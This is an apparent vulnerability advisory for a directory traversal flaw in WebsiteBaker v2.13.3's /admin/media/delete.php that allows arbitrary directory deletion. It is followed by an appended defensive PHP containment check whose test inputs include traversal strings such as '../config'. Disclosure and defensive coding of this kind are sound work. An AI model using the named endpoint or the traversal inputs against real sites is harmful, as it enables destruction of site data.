Vendor: WebsiteBaker
By: Mirabbas Agalarov
CVSS: 7.5 HIGH
Directory Traversal
CWE: 22
Product Name: WebsiteBaker
Affected Version From: 2.13.3
Affected Version To: 2.13.3
Patch Exists: NO
Related CWE:
CPE: a:websitebaker:websitebaker:2.13.3
Platforms Tested: Linux
2023
WebsiteBaker v2.13.3 – Directory Traversal
The WebsiteBaker v2.13.3 application is vulnerable to a directory traversal attack. An attacker can delete arbitrary directories by sending a specially crafted HTTP request to the /admin/media/delete.php endpoint. This can lead to unauthorized access and potential data loss.
Mitigation:
To mitigate this vulnerability, it is recommended to apply the latest patch or upgrade to a newer version of the WebsiteBaker application. Additionally, access to the /admin/media/delete.php endpoint should be restricted to authorized users only.
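A server-side containment check for a media-delete handler, as an added example that is not WebsiteBaker code and not from the advisory: it canonicalizes the requested directory and accepts it only if it resolves strictly inside the media root. The function name `resolveInsideRoot` and the temporary directory layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not WebsiteBaker code: resolve a user-supplied
// directory name and return it only if it lies strictly inside $mediaRoot.
function resolveInsideRoot(string $mediaRoot, string $requested): ?string
{
    $root = realpath($mediaRoot);
    if ($root === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false
    // when the target does not exist.
    $target = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // Compare with a trailing separator so a sibling such as "media-old"
    // does not pass as a child of "media"; the root itself is also refused.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0
        || $target === $root) {
        return null;
    }
    return $target;
}

// Constructed demo tree: <tmp>/wb_demo_xxxx/{media/gallery, config}
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wb_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/media/gallery', 0700, true);
mkdir($base . '/config', 0700, true);

// Constructed sample inputs: one legitimate name and several that must fail.
foreach (['gallery', '../config', 'gallery/../../config', '.', 'missing'] as $name) {
    $resolved = resolveInsideRoot($base . '/media', $name);
    printf("%-22s => %s\n", $name, $resolved === null ? 'rejected' : 'allowed');
}

// Clean up the demo tree.
rmdir($base . '/media/gallery');
rmdir($base . '/media');
rmdir($base . '/config');
rmdir($base);
```

A handler would run this check after its session and permission checks and pass only the returned canonical path to the deletion routine, never the raw request value.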